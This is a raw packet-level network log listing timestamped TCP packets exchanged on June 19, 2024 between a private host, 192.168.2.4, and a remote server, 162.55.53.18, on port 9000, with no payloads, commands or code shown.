Jun 19, 2024 14:40:16.327516079 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.327552080 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.327553988 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.327593088 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.327626944 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.327687979 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.382307053 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.382380009 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.382416964 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.382450104 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.382455111 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.382504940 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.382524967 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.382524967 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.382539034 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.382548094 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.382575035 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.382606983 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.382639885 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.382658005 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.382658005 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.382687092 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.382690907 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.382726908 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.382757902 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.382759094 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.382793903 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.382826090 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.382827997 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.382860899 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.382868052 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.382889032 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.382987022 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.383018970 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.383019924 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.383049965 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.383054018 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.383084059 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.383094072 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.383127928 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.383157969 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.383160114 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.383193970 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.383217096 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.383227110 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.383260965 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.383279085 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.383296013 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.383316040 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.383330107 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.383363008 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.383394957 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.383399010 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.383451939 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.383486032 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.383486032 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.383521080 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.383553028 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.383553982 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.383586884 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.383616924 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.383621931 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.383753061 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.417910099 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.417982101 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.418016911 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.418019056 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.418051004 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.418054104 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.418076038 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.418095112 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.418128014 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.418210983 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.471733093 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.471807003 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.471821070 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.471848011 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.471878052 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.471883059 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.471914053 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.471923113 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.471977949 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.471981049 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.471981049 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.472013950 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472044945 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.472049952 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472084999 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.472107887 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472141027 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.472145081 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472177982 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.472181082 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472213984 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.472218037 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472246885 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.472270966 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472300053 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.472306013 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472338915 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.472342968 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472378016 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472408056 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.472415924 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472450972 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472480059 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.472506046 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472541094 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472575903 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.472596884 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472631931 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472660065 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.472665071 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472701073 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472729921 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.472733974 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472770929 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.472774982 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472805023 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.472809076 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472841024 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.472845078 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472879887 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472881079 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.472913027 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.472915888 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472949982 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.472951889 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.472986937 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.473014116 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.473128080 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.473160982 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.473210096 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.473211050 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.473238945 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.473246098 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.473280907 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.473284960 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.473315001 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.473361969 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.508795023 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.508846998 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.508874893 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.508882046 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.508920908 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.508923054 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.508955002 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.508959055 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.508987904 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.509083033 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.560388088 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.560436964 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.560467005 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.560522079 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.560700893 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.562637091 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.562694073 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.562724113 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.562728882 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.562764883 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.562797070 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.562797070 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.562819004 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.562839031 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.562855959 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.562885046 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.562901974 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.562952042 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.562982082 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.562988043 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563040018 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563056946 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.563056946 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.563081026 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563112974 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.563134909 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563149929 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.563169956 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563198090 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.563204050 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563240051 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563261032 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.563294888 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563329935 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.563332081 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563363075 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563395977 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563397884 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.563440084 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.563457966 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563493013 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.563512087 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563545942 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563580036 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.563580036 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563613892 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.563613892 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563631058 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.563648939 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563683987 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.563684940 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563719988 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563721895 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.563750029 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.563770056 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563805103 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563819885 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.563819885 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.563838005 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563868046 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.563874006 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563906908 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563935995 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.563942909 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.563977003 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.564009905 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.564011097 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.564044952 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.564076900 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.564080000 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.564115047 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.564148903 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.564148903 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.564181089 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.564183950 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.564234972 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.564234972 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.600404024 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.600461006 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.600497961 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.600526094 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.600554943 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.600554943 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.600589037 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.600647926 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.651144981 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.651195049 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.651228905 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.651232004 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.651268959 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.651299953 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.651307106 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.651403904 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.653868914 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.653939962 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.653970957 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.653981924 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654006958 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654036045 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654048920 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654073000 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654103994 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654108047 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654139996 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654146910 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654176950 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654176950 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654230118 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654237986 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654237986 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654266119 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654299021 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654304981 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654336929 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654375076 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654405117 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654409885 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654442072 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654447079 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654480934 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654510975 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654515028 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654555082 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654586077 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654589891 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654623985 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654649019 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654649019 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654659033 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654685020 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654691935 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654743910 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654777050 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654797077 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654812098 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654820919 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654841900 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654865026 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654895067 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654911041 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654942036 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.654944897 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.654979944 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.655009985 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.655015945 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.655056953 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.655061007 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.655086994 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.655092001 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.655126095 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.655155897 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.655162096 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.655196905 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.655225039 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.655230999 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.655267000 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.655296087 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.655303001 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.655337095 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.655364990 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.655370951 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.655400991 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.655406952 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.655445099 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.655472994 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.655836105 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.690820932 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.690871954 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.690901041 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.690908909 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.690948009 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.690949917 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.690984011 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.691250086 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:16.741856098 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:16.741925001 CEST	9000	49748	162.55.53.18	192.168.2.4
